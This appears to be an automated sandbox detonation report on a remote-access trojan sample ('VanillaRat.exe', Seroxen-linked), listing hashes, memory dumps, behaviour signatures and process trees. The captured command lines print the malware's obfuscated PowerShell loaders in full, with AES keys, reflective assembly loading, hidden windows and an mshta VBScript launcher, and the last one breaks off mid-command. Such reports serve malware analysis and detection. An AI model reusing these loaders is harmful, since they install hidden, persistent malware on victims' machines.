memory/1120-151-0x000001EFAA6F0000-0x000001EFAA717000-memory.dmp

memory/1096-148-0x000002906EE60000-0x000002906EE87000-memory.dmp

memory/1096-149-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

memory/420-139-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

memory/424-135-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

memory/424-134-0x0000024D61C90000-0x0000024D61CB7000-memory.dmp

memory/996-130-0x0000012C24260000-0x0000012C24287000-memory.dmp

memory/468-125-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

memory/640-124-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp

memory/692-121-0x00000149E4CE0000-0x00000149E4D07000-memory.dmp

memory/640-117-0x0000028CDD800000-0x0000028CDD822000-memory.dmp

memory/4716-115-0x0000000140000000-0x0000000140028000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.4dc3ac07-b339-43cc-901e-cb521eccfa3a.tmp.csv

MD5 0dfe21816632d1f53f37eb791b02a24e
SHA1 0a1763d0752e0334fee2cd905aa230048e6a5113
SHA256 964e2f3426ab175c933c9149d8fe4302f555d2d346b344ce19a0c53d6867bd1d
SHA512 decdb66522217c5ca36fa6faceeb995df7ad056f4d409401cbb1cf38efc4ee0755162c2b7e884a64f9fa61d73638d77ed9021ca234b55bf061ae28e5db91555f

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9ff30b4f-331b-4e0b-b799-a69fe5191378.tmp.txt

MD5 bb127983170b4affbd37e7c7c1d58f74
SHA1 28cd2c40bedbad606c1c27e36194c655eaca71e0
SHA256 abc080af4d4156467aea3f74cbb8f0a2f32d45ff26973fcf8974555d714e92e2
SHA512 73af4e872963c0e8c3cf906af707371e8a6c6ffa8fa79f182e1b5958b3ba5b019276dee629d511ea6d3430b18675ec17bf5a59c899490a12c46f9a0e840cf98c

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ff54c4ef-f9ba-4dcf-831f-aed520c76a2f.tmp.csv

MD5 2b4730b3193d16fb35ce5333c41054b0
SHA1 c8797e421c6baa8347007d495c8dd45fe722672a
SHA256 0b628a9b5530e085441ae850b04b11402a48926f6552c771d0c3eeb1a273c0ae
SHA512 daa5bbe52eb182c0c773cdada347084ef90065d672edf87ce730c6c52f1f414e02b3a4d24537fbe3f0c5b78a9f8b25f841135704af0dd1aaa4feb939d9d27a84

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d36101a0-8bbc-4f58-9376-e66b1e9d058e.tmp.txt

MD5 19dd5bf5f040cd8938d4906de40fc6b4
SHA1 6897482ae7731de937b323da5fb470722fa7df98
SHA256 ef42103f97d449551d0b0b2b0ec157e6dea6a9f42117699cbf43fa6f3f99e7e6
SHA512 f1b23f9cbdcb89ea12ecef4f40990a6c48ba7f0a330fa784f56c02db9fe5e89310ccad5f3cde2ea332fbd4359e3beb910b64c79bd5b7d452002be3cf6019a070

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.343706d5-b3a5-4b5a-9558-4aee2662dc89.tmp.csv

MD5 a1943b66516a4160e4a1dfd76bb862fe
SHA1 ded42d5dbf064403aa95e7dbca31927e6e2abcf9
SHA256 fac149a4a9ca62ac11ad9d680cec535f259a18ccf725607cd9057fc96b372053
SHA512 32433e1bfb993dcc22588044edee28270df62b9462caf5abf5963175c656fab4eea211bbe154fdc8e14eecceaad59ab2459d82caeb3445136dd5d0ef72c2d7e9

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.26a1de1a-702b-4c53-ba3b-e4209748b7bc.tmp.txt

MD5 efdb005de50dcccd0e5a0d9c9cb69eb3
SHA1 b31b96ff9d4a5fbbb98ff972fff5222c1b96c7e0
SHA256 873f276fed49ddb032081564121b5a002c415890b53ddacd183f8bf56bb5ee16
SHA512 813320b292689e172832f3a4cf60597c8501d0abc5d01d3080d4c5cb398dfcb4d2979fee66675f3a8767433646dc8e396483fc07a083add21ff1e58a7da5a21a

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-18 13:35

Reported

2024-08-18 13:37

Platform

win7-20240704-en

Max time kernel

22s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe

"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

Network

N/A

Files

memory/2432-0-0x000007FEF56C3000-0x000007FEF56C4000-memory.dmp

memory/2432-1-0x0000000000A20000-0x0000000000BDE000-memory.dmp

memory/2432-2-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp

memory/2432-3-0x000000001BEF0000-0x000000001BFD0000-memory.dmp

memory/2432-4-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp

memory/2840-9-0x000007FEECC8E000-0x000007FEECC8F000-memory.dmp

memory/2840-10-0x000000001B350000-0x000000001B632000-memory.dmp

memory/2840-11-0x0000000001F60000-0x0000000001F68000-memory.dmp

memory/2840-12-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

memory/2840-13-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

memory/2840-14-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

memory/2840-15-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

memory/2432-16-0x000007FEF56C3000-0x000007FEF56C4000-memory.dmp

memory/2432-17-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp

memory/2840-18-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

memory/2840-19-0x000007FEECC8E000-0x000007FEECC8F000-memory.dmp

\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/2840-25-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-18 13:35

Reported

2024-08-18 13:37

Platform

win10-20240404-en

Max time kernel

60s

Max time network

21s

Command Line

winlogon.exe

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4588 created 564 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\system32\winlogon.exe
PID 4588 created 564 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\system32\winlogon.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\$sxr-mshta.exe N/A
N/A N/A C:\Windows\$sxr-cmd.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Windows\$sxr-mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1468 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1468 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4296 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 4296 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4296 wrote to memory of 4588 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 4296 wrote to memory of 4588 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 4588 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1416 wrote to memory of 1868 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 1416 wrote to memory of 1868 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 1868 wrote to memory of 3928 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 1868 wrote to memory of 3928 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 4588 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4588 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4588 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe

"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{05f2ac45-92e4-4f14-8881-ace328a0574e}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{d36bbe4c-8175-4128-847f-69464971dbfa}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 